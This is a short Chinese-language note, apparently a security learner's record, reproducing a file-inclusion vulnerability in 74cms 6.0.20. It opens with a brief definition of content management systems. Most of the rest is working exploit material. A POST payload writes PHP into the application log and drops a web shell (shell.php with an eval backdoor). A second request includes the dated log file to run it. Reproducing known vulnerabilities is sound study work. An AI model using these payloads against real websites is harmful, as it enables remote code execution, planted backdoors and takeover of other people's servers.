cms简介：

内容管理系统（content management system，CMS），是一种位于WEB前端（Web 服务器）和后端办公系统或流程（内容创作、编辑）之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet网站的信息。

Cms就是已经装修好的房子，你只需要改改装修即可。

1、74cms漏洞复现

74cms 6.0.20版本文件包含漏洞复现_74cms v6.0.20-CSDN博客

apache版本为5.xx
不要高版本，不然无法运行

Thinkphp
http://xxx.com/index.php/模块/控制器/操作

http://127.0.0.1/cms/74cms/upload/index.php?m=home&a=assign_resume_tpl
home下的assgin_resume_tpl函数

在日志里写入木马
POST：variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET[‘id’]"/>

日志改为当前日期24_11_17
POST：variable=1&tpl=data/Runtime/Logs/Home/24_11_17.log

调用木马

成功包含